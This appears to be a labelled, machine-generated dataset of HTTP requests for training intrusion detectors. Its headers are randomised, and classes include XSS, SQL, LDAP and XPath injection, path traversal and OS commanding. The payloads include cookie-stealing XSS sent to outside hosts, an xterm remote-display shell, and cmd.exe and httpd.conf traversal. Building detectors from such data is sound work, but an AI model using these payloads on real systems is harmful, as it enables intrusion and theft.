Expect: tdaRtn=awSs;tdeecu=rppo
From: vliMTora@eeed.de
If-Modified-Since: Wed, 17 Jan 07 10:38:58 CET
If-Unmodified-Since: Thu, 07 Jun 07 11:18:37 GMT
If-Match: *
If-None-Match: "_x6TXIKrvzEGk3r4.hUA"
If-Range: *
Max-Forwards: 6209
MIME-Version: 1.3
Pragma: tlgh='7seaeit9'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: 9egno 97tg0=oEgI5oy
Range: 4539-14148,-19,934-
Referer: /emksUinn/ulcx/teeelne.doc
TE: chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: r4TI3txb http://www.w6rOm.be
UA-CPU: x86
UA-Disp: 378,9839,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: HTTP/6.6 24.132.79.210, ls7X/5.6 97.71.83.204
Transfer-Encoding: eeso; hsbs=saryo8
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42234
Start - Id: 40771
class: SSI
POST /cahnadrTw/2bkoptd0dePt/_zn/tsKDIS1/e_ujtg6kIjH_zX/rN-rdeleteaoXUslX/yhx9T5yVeIeBoW/c9d/nemwAnaoetaKe/rAeautoexeciincludelVj99GU4M.htm? HTTP/1.0
Content-Length: 198
Content-Language: ZTcde,aal
Content-Encoding: compress
Content-Location: /rtt8Srd/DhUit/eHhzsje6/hdsh2/tyndgo3t.js
Content-MD5: Z2xhcG83cW1zRmxnb2wwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Aug 08 11:56:46 UTC
Last-Modified: Thu, 26 Aug 04 16:34:41 GMT
Host: 122.96.38.34
Connection: close
Accept: image/*, audio/basic
Accept-Charset: windows-1252, euc-cn;q=0.1, utf-7
Accept-Encoding: 
Accept-Language: aossams-hrlbcgv, dAld-nfem;q=0.2
Cache-Control: no-transform
Client-ip: 166.41.33.129
Cookie: oIliearsGn=8ralyh;tamtnL=taohii;erh=es] ?
Cookie2: $Version="1"
Date: Sat, 01 May 04 15:05:00 UTC
ETag: "nl3cCS-91kvJ.@5g"
Expect: neiat
From: DbshI@eusrtwIFth.ch
If-Modified-Since: Sun, 23 Oct 05 14:18:50 CET
If-Unmodified-Since: Tue, 19 Jun 07 11:47:19 CET
If-Match: "aDYOLld0vd71u9yp6"
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: *
Max-Forwards: 493
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic ZW55bmVJbzpsdWxubXk=
Authorization: hpbs rtdmeDr=0oOs
Range: 07-9,0-,-333
Referer: /lpW7/nwesp/laoe/tsul/BaasOu.jsp
TE: trailers,chunked,deflate;q=0.3
Trailer: Accept-Language
User-Agent: lsahbhhaVtecbmsEsRp
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 9aAnsp/2.7 www.etaatnw.jpg, HTTP/0.0 152.243.230.174, 5.2 www.pamslzs.jpg:0
Transfer-Encoding: identity
Upgrade: rhe/3.3
Warning: 513 www.et5ew.css "lNharrszlthnl3onoe0u" 
X-Forwarded-For: 31.100.82.188
X-Serial-Number: 476043
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

cos3n=hNsystem&DroseeL=<!--  #odbc  statement ="select  aE1e,  2keoh1,  t7 from   rottlR  order by    6,  25,     8" -->&2anFj9yyMoB=d&o8mrsnie=tmp&fGlSF5C=e-qelno&nedapenbre=9

End - Id: 40771
Start - Id: 43263
class: OsCommanding
GET /b5taev/sew4eel/hdfJ6YMNhXC/jtTnoPQ/o8XFwzf.sh?gebL=blodRiI&oHdtdu9es7l5s=imgl&oo24airayaiT=003530933&n4prmcig0h=uK99a&HB1ChFq2=p&srntn=tnOcdH&Dnet7tqdrnvit=%250A+++xterm+++++-display++++www.lirech.com%3A0.0+ HTTP/1.1
Host: 244.183.183.174:80
Connection: ilFu59r
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 116.247.114.110
Cookie: fN2tJ0oupdateYwh-=q;epxhSp7qrw7=adminc9n+t;k8NU21YHmFKwhere=1627
Cookie2: $Version="54"
Date: Mon, 11 Sep 06 22:08:00 GMT
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Thu, 30 Apr 09 08:04:16 CET
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 571
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: i2ec faesnld=eEobqceo
Range: -640387
Referer: http://www.l5erP6.biz/3its/6Anwr/wtsRg/vmtniiY/jrgrceiE.png
TE: gzip,chunked,trailers
Trailer: Via
User-Agent: Mozilla/8.0 (Machintosh; U; Mac OS X 3.3; f9-va; rv:0.2.7) Gecko/18444462
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: 3.5 147.116.170.65, oyk/3.9 18.43.240.207, 8.9 29.18.197.225
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 553121190182203403
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43263
Start - Id: 49294
class: XPathInjection
GET /theoe9lTcytorcoest0b/ledbr/XkscriptQ9WFIHutCDm/frAor8nm/tHkaruEooro8/aceeSheoir6/do3vbqpchna/JevalAhavingCWiframeppsPp/hededBbnnnn.html?saL4t=4254+or++1%3C+bu%2FAmLoh%2FeSli%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D11%5D+++++or+++4244%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 225.253.69.104
Connection: piTdnAm
Accept: audio/basic;q=0.1, text/*;q=0.2, application/*;q=0.6
Accept-Charset: iso-8859-1;q=0.8, hz-gb-2312;q=0.1, x-mac-arabic, euc-kr
Accept-Encoding: *
Accept-Language: stmtrbp-onShi;q=0.6
Cache-Control: no-cache
Client-ip: 248.142.244.103
Cookie: oann7An3=olue5Tieiaoin;cIeg=l52yKX53;reeIt=67318503;tt7syi=vliavo;nahEon5f=06;tpeSFhbeauxmno=Ot
Cookie2: $Version="213"
Date: Thu, 04 Nov 04 03:18:13 CET
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 07 Mar 08 16:40:00 CET
If-Unmodified-Since: Tue, 28 Feb 06 13:38:23 UTC
If-Match: "h.EAPtYo7V.8JSq0r"
If-None-Match: "Tv_8_QwBhSU1limYRq8"
If-Range: *
Max-Forwards: 59
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: OmthsX Nttea6=9rlenb
Range: 86-1461,597962-028810
Referer: /pTtil/tipinai.sh
TE: chunked;q=0.3
Trailer: Trailer
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 0.2; es-mk; rv:4.7.2) Gecko/72654703
UA-CPU: PowerPC
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7516x496
Via: 6.5 www.hdsrTc.png
Transfer-Encoding: identity
Upgrade: kefEa/0.4, sicxsn/0.6, oeAol/1.0, tMesla/8.7
Warning: 172 140.116.163.38:5 "oRfa" 
X-Forwarded-For: 137.94.37.177
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49294
Start - Id: 47923
class: XSS
GET /ohbalRBllosaeeonepy/749avdUadh__mjnZx1/VwLrmfN3dHfs7o/io/tiato/wMRU.PeFiGMygz.V2/nnxnuhGdlg8tesievf/bx5MG/uimXtui3eOtupAe/eefee.tiff?hBusrchild0RbpB=siuopenxml&hUuo=s-9K&aSdHIm300kB=34493&llit7=%3Cxml+++++id+++%3D++%22+X%22++%3E%3Ca%3E%3Cb++++%3E%26lt%3Bscript+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.toar.com%2Fcgi-bin%2Ftrra.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+%3E%3B%3C%2Fb+++%3E%3C%2Fa++++%3E%3C%2Fxml++++%3E&BlieoiheaoFNdx=ascaejeotfxsaphsM HTTP/1.0
Host: www.shihuh.org:7
Connection: sgeoms0
Accept: */*
Accept-Charset: big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: thhss='kdoA'
Client-ip: 249.54.30.10
Cookie: ehrneiekgy=hgiise;IULVDFwZN5V=99872;Mqti=56;nctmpBZzs7winntwhere=25889;includeCMcopyZinsertPm_ET=7rnoNmr7;aexb92ebkeI=61372
Cookie2: $Version="61"
Date: Tue, 13 Jul 04 24:56:58 UTC
ETag: W/"zaALvGTogQK3DnCL5"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: dtlie@titeAadsjb.com
If-Modified-Since: Fri, 21 Nov 08 07:20:30 CET
If-Unmodified-Since: Thu, 22 Dec 05 19:10:49 GMT
If-Match: ".n7xccyIzk3hO0XU8B.6"
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: Wed, 14 Dec 05 23:50:21 GMT
Max-Forwards: 4800
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: Basic c250RGlZaTozZXl1TWxs
Range: 16-10857
Referer: http://www.it5arwft.com/nrqd/zDtn0N5w/tveohtea/vAyc.wav
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 3.0; Sh-Ie; rv:5.0.0) Gecko/53010354
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 229x467
Via: 2.7 223.182.232.86, 4.8 www.2u4r0t.jpg, HTTP/7.7 61.176.186.103
Transfer-Encoding: identity
Upgrade: fxd/6.1, eet/0.1, fuo/9.7, elrnan/6.1, mmna/4.6
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 198.152.150.100
X-Serial-Number: 03181480810
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47923
Start - Id: 37508
class: LdapInjection
POST /Vp/eiyXRmySoGc9a0kH/eaeehqrR4hgwrscsri/nc0a_imgUPGTiEaEzFI/wgetSAfMIj0adMT9/3lfB/wVSf1g@x8A9J6gB.mdb? HTTP/1.1
Content-Length: 240
Content-Language: ntoNitwk
Content-Encoding: compress
Content-Location: http://www.Oeoicqu.com/TKionda/spumvle.pl
Content-MD5: eGVkeGFBaGFhZjF0T2h1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Aug 06 04:01:13 UTC
Last-Modified: Mon, 18 Apr 05 15:28:12 UTC
Host: www.otH0epe.st:811
Connection: esShe
Accept: */*;q=0.5
Accept-Charset: euc-cn, iso-8859-15
Accept-Encoding: *
Accept-Language: Edkhre-98gnEqe;q=0.7, oD-a, bwgqsa7-on, a-rr
Cookie: weLjorsgo=650;o2y1t=1131;7ttfNarfditI=3781683;lxsaytth45=h0iufTnoeeocr3vuRs;IeocsgraEff=Ia8eEssNheem0ori;C7dprma=51024
Cookie2: $Version="089"
Date: Sun, 01 Jul 07 05:00:31 CET
ETag: "DVOl143jke2PWR-a"
From: t7in1r0e@I35dntt6be.fr
If-Unmodified-Since: Sun, 19 Jun 05 07:25:42 UTC
If-None-Match: *
If-Range: Sun, 03 Oct 04 03:29:53 CET
Max-Forwards: 28
MIME-Version: 0.6
Pragma: mbfulq=satadsm
Authorization: rhos4a rmmaoct=ndtnr
Referer: /pT1sw/sosfe/7Wmnex/aezapnm/dEten.asmx
TE: gzip,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/7.1 (Windows; U; Win98 3.1; eO-mx; rv:8.9.2) Gecko/84487612
UA-Pixels: 2665x9772
Transfer-Encoding: compress

y2qf-csX0EN=)  (|(displayName=had*)    (name=    had* )(mail=had*    )&Plrsie0a5=-]s2 -in1&Dj&wne=24&wuoisiirk=364671659&sa67WliIonms=620391108&3eoi6nlt1l=ya&aaeb=481&nhEmueicqhawH=Naai&GiddpefoxumSai=cteiict%e

End - Id: 37508
Start - Id: 36062
class: PathTransversal
GET /enHB/YU1uwp-httpPC5MmdM6P.css?blWYvjconnectVTAD=sLmg&oeu1=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fonartaontr%2Fenieneat%2Fet%2Fololni.msf&aN8wsog=Wstoe&EcYI8YYoaYC=kymYrRu3Kc5&is=d++e&gjpnwu8FrmLs=e%2Bhmehh32lr&TnANA=8ittinlpSorb&wmJSduyde=3&idtEtnfms=Oeon&mti=48&ubeyBnIeoIllCt=897037871&uwtYfQ0oVX=o%3Aeautoexecy&R2ruiiezn4iew=ncviji++siEhq%7E%27b&stttteio6shlsi=631&WSA5O7Xl9=2051396 HTTP/1.1
Host: www.tsitD.fr:80
Connection: close
Accept: text/plain;q=0.2, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 75.78.7.59
Cookie: cjgse=9hUXufyADw;8Re57=tIpeetjtstnh;oeeoo=to s
Cookie2: $Version="742"
Date: Mon, 27 Dec 04 23:25:25 UTC
ETag: "nwiJcHK5AiUwYPQsUKR"
Expect: rthr
From: Esva@5c4oorIai.it
If-Modified-Since: Fri, 25 Feb 05 23:34:02 CET
If-Unmodified-Since: Mon, 13 Oct 08 23:45:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Aug 09 13:31:24 UTC
Max-Forwards: 76
MIME-Version: 1.3
Pragma: De=5idT
Proxy-Authorization: 19itfn 7tpA=rbeich
Authorization: sesr dyand1=Ihe1t
Range: -31,-3,49859-
Referer: http://www.tTasd.gov/fgR39/hoqupid.aspx
TE: deflate
Trailer: Warning
User-Agent: bEa6e1oeA (lGI4aR@O)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: FTP/6.8 103.130.154.78, 6.0 www.xan3n.gif, 3.1 www.1moleexq.css:441
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36062
Start - Id: 49267
class: XPathInjection
GET /eFjewT5iaMKdiD1/sgmaaro/lIBsX0076/z6QHyqa9OvhzH/8UzcDgaroPjMetP/KechoHRGRls1/ehoedynweNxmeo/eVY-VAG9id3H/eBL-BORmdD.asp?tl=78752266&ehadt8=eo&reEo1tmir=18&gaMrxxeIermrnih=ul%7Er&irudixspai=bTioitNsrse&2es25iar=l9z%2Ftef%2Ftjbtt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D+or+++++%27dcdabni%27+++%3D++%27 HTTP/1.0
Host: 32.198.213.99
Connection: close
Accept: text/html, image/jpeg
Accept-Charset: windows-1255, windows-1258, x-mac-chinesesimp;q=0.8, iso-8859-7
Accept-Encoding: *
Accept-Language: dbNex-finAldp
Cache-Control: no-store
Client-ip: 8.241.86.122
Cookie: e4idettwren=7331;mtaenttoehOzcnO=hle/rfx
Cookie2: $Version="395"
Date: Mon, 28 Jan 08 06:24:16 GMT
ETag: W/"U5U_78@j-0G5kJ9g"
Expect: GerE30=m8mee1ye
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Wed, 05 Jul 06 23:22:38 GMT
If-Match: *
If-None-Match: *
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 949
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: NTLM M2Jid2VpZzZzZHRtMWxTZWhpcGM3aWRwZXRCbG9mcm1lZWduZHJoamV5b3Q4dGM=
Range: 560-83908
Referer: /59gezaeE.gz
TE: trailers,deflate,trailers
Trailer: TE
User-Agent: Mozilla/4.2 (compatible; teq94yweoa; Open BSD i386; uagulotan; h4sLBtsmS; cm1hp)
UA-CPU: x86
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 2.2 197.241.147.220
Transfer-Encoding: deflate
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49267
Start - Id: 42485
class: SqlInjection
GET /jow.pMwxT/rZSEyl_6Rhgp0j.gif?Qa3c=tBWmoxWOox&EiXSp.pOP=259&4aegeted=qwer%27+++or++++ugxioo_v.Account%3D%275denIae%40ieqot.com&bdidshtOrfwmsen=N%3Bchv&mrheRanIahpi=tearecit&shoFk1nxgzTqJl=a5JtZ3Nq&wikgmi=areplace0A HTTP/1.0
Host: 70.70.112.95
Connection: rrarr0n
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.6, deflate, gzip;q=0.3, identity;q=0.9, identity;q=0.0
Accept-Language: 3nthaet4-vk, t-k0seuax;q=0.2, gttrkng-ty
Cache-Control: min-fresh=4756
Client-ip: 89.45.12.136
Cookie: n2vns=rm7UVrAcosh7bpiu@=8;ut7inonayrnt=rpiqYZthw;kmSw56r=82785;bwiwLonatO=6180
Cookie2: $Version="2"
Date: Sun, 23 Nov 08 06:03:04 GMT
ETag: W/"yIy09km3OC5eA@3"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Sun, 17 May 09 12:48:11 CET
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: emmed 32haU8=slot
Range: 7-59040
Referer: http://oyhashl.fr/ehddderm.pdf
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (Windows; U; Win98 5.0; vt-k8; rv:9.7.3) Gecko/15936127
UA-CPU: x86
UA-Disp: 6364,160,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 733x829
Via: hues/8.8 107.178.28.50, FTP/5.4 www.ntEr3r.css, FTP/2.3 142.32.158.214
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42485
Start - Id: 47856
class: XSS
GET /ns6ipreesent/orntr9tds8/e0dqnDYxNV7wmV/FedcsduObhsva/obGFz00n9RfvDvQomhTB/lW0vUlR5pPWR_OM/bodyyKPMxp_/3XwT/gJ8uPhN@v/KxI/TrrfeuluatyoeulKgt.dll?oaisrac6Ri1eyt=%3Cxml+id++++%3D++++%22+X+%22+++%3E%3Ca+++%3E%3Cb%3E%26lt%3Bscript%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.aseren.com%2Fcgi-bin%2Fsitatrer.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb%3E%3C%2Fa+++%3E%3C%2Fxml%3E&x7DrcpsystemSCAU=FHNtbmiscnnir HTTP/1.1
Host: 105.8.232.238
Connection: o1Te
Accept: */*;q=0.1
Accept-Charset: shift_jis;q=0.3, koi8-r, iso-8859-5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: zhpqs='Elesiu'
Client-ip: 237.181.40.228
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Thu, 27 Mar 08 21:07:26 CET
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: mrthhp=AsnbEEk;eeuvr
From: tioExt@xadhwC.ch
If-Modified-Since: Wed, 01 Jun 05 22:15:51 UTC
If-Unmodified-Since: Wed, 10 Aug 05 18:50:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 367
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest opaque="dafoil"
Range: 595606-7,222673-07
Referer: /emahWt/InEtp/eFheem/dpbWt.asmx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 1.8; ce-ne; rv:7.0.9) Gecko/60359353
UA-CPU: x86
UA-Disp: 4309,162,32
Via: 7.9 www.tesnn.tiff:38
Transfer-Encoding: gzip
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 188.24.5.207
X-Serial-Number: 110017564718
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47856
Start - Id: 44515
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 218.37.170.150
Connection: close
Accept: image/*, image/*;q=0.5
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 59.223.109.143
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="1"
Date: Wed, 04 Oct 06 09:23:53 GMT
ETag: W/"HcdXasxzouezv38hXg"
Expect: zfHsd=neeRao
From: aOaort0e@ftfehuiid.cz
If-Modified-Since: Fri, 26 Mar 10 09:09:18 GMT
If-Unmodified-Since: Fri, 06 Jun 08 09:44:51 CET
If-Match: "ygxw0oO2wAerM5Mu"
If-None-Match: "6mtLE695gjWc2wdkPTH5"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 7-42
Referer: /a3tiztza/nw1arWB/uosdauo4/Mmu5ot/2mntph0.msf
TE: trailers
Trailer: Warning
User-Agent: i8jKrVjfH4 http://www.soSmd.fr
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/5.2 www.tshkja.jpeg, crau/9.1 176.142.109.4
Transfer-Encoding: compress
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44515
Start - Id: 46051
class: PathTransversal
GET /dno/tfheaeieplIe.sh?8eegf=aotEd0u&wR4lOrm=pOSkXacl HTTP/1.1
Host: 182.81.48.118
Connection: tnt59
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 252.1.75.0
Cookie: d0mbona=/etc/httpd/httpd.conf
Cookie2: $Version="17"
Date: Tue, 17 Feb 09 06:50:31 UTC
ETag: "bhrBinUpFaHTGfqr"
Expect: 2lhr0=hnrA;dnlnid4=ymEe
From: noioi@Hnopfds.gov
If-Modified-Since: Sun, 07 Mar 04 23:57:34 CET
If-Unmodified-Since: Sun, 16 Apr 06 10:03:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 387
MIME-Version: 4.6
Pragma: Uryt34n=miieAa
Authorization: Digest realm
Referer: http://hmey.com/0pdesp/piejelhd/reR5a/sumn.gif
TE: chunked,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/1.3 (X11; U; Linux i586 5.7; U6-us; rv:1.8.4) Gecko/29721112
UA-Disp: 478,2158,8
UA-OS: Solaris
UA-Color: color32
Via: FTP/3.6 205.197.43.252, swsmlc/6.6 25.22.132.230
Transfer-Encoding: identity
Upgrade: domfsc/6.5, zfo9/7.9
Warning: 762 198.204.149.124:790 "fimrmytnwtsNote" "Tue, 03 Jul 07 15:54:22 GMT"
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46051
Start - Id: 44427
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: 105.154.129.8
Connection: close
Accept: text/*, application/*, image/*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: compress
Accept-Language: o-fdk;q=0.2
Cache-Control: min-fresh=21
Client-ip: 27.105.36.250
Cookie: ntFgQ=fgYk9U;np1oeeinae3omob=8385;r6l8q6Avqme=wnfuc;dufrhw=2jitiEorerotPnl
Cookie2: $Version="74"
Date: Thu, 16 Feb 06 24:55:34 GMT
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sat, 25 Feb 06 16:45:11 CET
If-Unmodified-Since: Mon, 29 Dec 08 06:09:27 GMT
If-Match: "hQOO.YwZs1b3wzs_H"
If-None-Match: "pc2xKH6cbzmo6vafF"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="orIrleta"
Authorization: Basic aWV0YTp0REht
Range: 6-02287,72753-
Referer: /aeutcTe/onMeso/cai4/wngg.msf
TE: deflate;q=0.1,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/9.7 (X11; U; Linux i386 9.7; ac-fu; rv:4.3.5) Gecko/28316189
UA-CPU: Sparc
UA-Disp: 4806,9378,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: 8.6 248.170.100.124:6
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 42253
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44427
Start - Id: 37818
class: LdapInjection
GET /5r.mspx?oahwmn6=shutdownperl+aloirstew4txd&ph4otaehdvem=0135&tnta=tkIFe2ixShmEhosyru&dcest=OOcB%29%28%26%28objectClass+%3Diqst*%29&piaEZttpIejAy7w=76613 HTTP/1.0
Host: 246.218.4.217:47788
Connection: elrlgc
Accept: video/*;q=0.7, audio/*;q=0.6, text/xml
Accept-Charset: iso-8859-4
Accept-Encoding: 
Accept-Language: Snfman-l, sT-iiaFt;q=0.7, crw-tgai;q=0.6, iddanR-Eoaish;q=0.9
Cache-Control: max-age=61
Client-ip: 128.134.23.121
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="1"
Date: Wed, 22 Dec 04 07:12:26 CET
ETag: W/"lGpYRhRZnAlflCSac1OL"
Expect: soee=rrillw0;tfrta=vHins
From: inAltlp8@n6nlbheD8q.it
If-Modified-Since: Thu, 20 Nov 08 20:04:09 CET
If-Unmodified-Since: Tue, 16 Feb 10 19:41:15 GMT
If-Match: "XdyF.DsXoPOBrd-Cv"
If-None-Match: "y61iNKusWICoXiV"
If-Range: *
Max-Forwards: 66
MIME-Version: 0.8
Pragma: McTS='3iM'
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic N2FkYmlyczp5bHFyb2VJ
Range: 094778-515740,335144-
Referer: http://www.tsIdv.fr/01f8weo/aAcse/yieoyh.txt
TE: deflate;q=0.2,chunked
Trailer: TE
User-Agent: Mozilla/6.8 (compatible; Konqueror/1.8; Linux i386; sdd5tojn; afgthtji7e; 2oneruso9)
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: aer4t/9.6 145.49.168.205, 7.4 www.hE9y5s.jpg
Transfer-Encoding: deflate
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
